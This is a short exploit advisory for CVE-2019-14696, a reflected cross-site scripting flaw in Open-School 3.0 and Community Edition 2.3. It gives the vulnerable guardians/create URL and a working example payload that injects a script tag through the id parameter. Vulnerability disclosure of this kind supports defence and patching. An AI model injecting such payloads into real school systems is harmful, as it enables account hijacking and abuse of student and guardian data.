Share
# Exploit Title: [title]  
# Date: [2019 08 06]  
# Exploit Author: [Greg.Priest]  
# Vendor Homepage: [https://open-school.org/]  
# Software Link: []  
# Version: [Open-School 3.0/Community Edition 2.3]  
# Tested on: [Windows/Linux ]  
# CVE : [CVE-2019-14696]  
  
  
Open-School 3.0, and Community Edition 2.3, allows XSS via the /index.php?r=students/guardians/create id parameter.  
  
/index.php?r=students/guardians/create&id=1[inject JavaScript Code]  
  
Example:  
/index.php?r=students/guardians/create&id=1<script>alert("PWN3D!")</script><script>alert("PWN3D!")</script>